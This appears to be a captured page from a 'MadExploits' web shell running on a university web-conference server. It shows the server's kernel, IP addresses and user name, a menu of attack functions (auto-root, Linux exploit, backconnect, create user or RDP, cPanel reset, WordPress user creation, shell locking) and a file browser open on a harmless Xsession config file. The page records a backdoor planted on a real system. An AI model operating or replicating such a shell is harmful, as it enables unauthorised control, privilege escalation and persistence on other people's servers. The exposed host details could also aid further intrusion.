Linux web-conference.aiou.edu.pk 5.4.0-204-generic #224-Ubuntu SMP Thu Dec 5 13:38:28 UTC 2024 x86_64
Apache/2.4.41 (Ubuntu)
: 172.16.50.247 | : 18.226.248.119
Cant Read [ /etc/named.conf ]
7.4.3-4ubuntu2.28
appadmin
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
BLACK DEFEND!
README
+ Create Folder
+ Create File
/
etc /
X11 /
Xsession.d /
[ HOME SHELL ]
Name
Size
Permission
Action
20dbus_xdg-runtime
1.04
KB
-rw-r--r--
20x11-common_process-args
1.98
KB
-rw-r--r--
30x11-common_xresources
878
B
-rw-r--r--
35x11-common_xhost-local
389
B
-rw-r--r--
40x11-common_xsessionrc
187
B
-rw-r--r--
50x11-common_determine-startup
1.53
KB
-rw-r--r--
60x11-common_localhost
146
B
-rw-r--r--
60x11-common_xdg_path
991
B
-rw-r--r--
90gpg-agent
880
B
-rw-r--r--
90x11-common_ssh-agent
629
B
-rw-r--r--
99x11-common_start
166
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : 60x11-common_xdg_path
# This file is sourced by Xsession(5), not executed. # Add additional xdg paths depending on selected desktop session DEFAULT_XDG_CONFIG_DIRS='/etc/xdg' DEFAULT_XDG_DATA_DIRS='/usr/local/share/:/usr/share/' if [ -n "$DESKTOP_SESSION" ]; then # readd default if was empty if [ -z "$XDG_CONFIG_DIRS" ]; then XDG_CONFIG_DIRS="$DEFAULT_XDG_CONFIG_DIRS"/xdg-"$DESKTOP_SESSION":"$DEFAULT_XDG_CONFIG_DIRS" elif [ -n "${XDG_CONFIG_DIRS##*$DEFAULT_XDG_CONFIG_DIRS/xdg-$DESKTOP_SESSION*}" ]; then XDG_CONFIG_DIRS="$DEFAULT_XDG_CONFIG_DIRS"/xdg-"$DESKTOP_SESSION":"$XDG_CONFIG_DIRS" fi export XDG_CONFIG_DIRS # gnome is already added if gnome-session installed if [ "$DESKTOP_SESSION" != "gnome" ]; then if [ -z "$XDG_DATA_DIRS" ]; then XDG_DATA_DIRS="$DEFAULT_XDG_DATA_DIRS" fi if [ -n "${XDG_DATA_DIRS##*/usr/share/$DESKTOP_SESSION*}" ]; then XDG_DATA_DIRS=/usr/share/"$DESKTOP_SESSION":"$XDG_DATA_DIRS" fi export XDG_DATA_DIRS fi fi
Close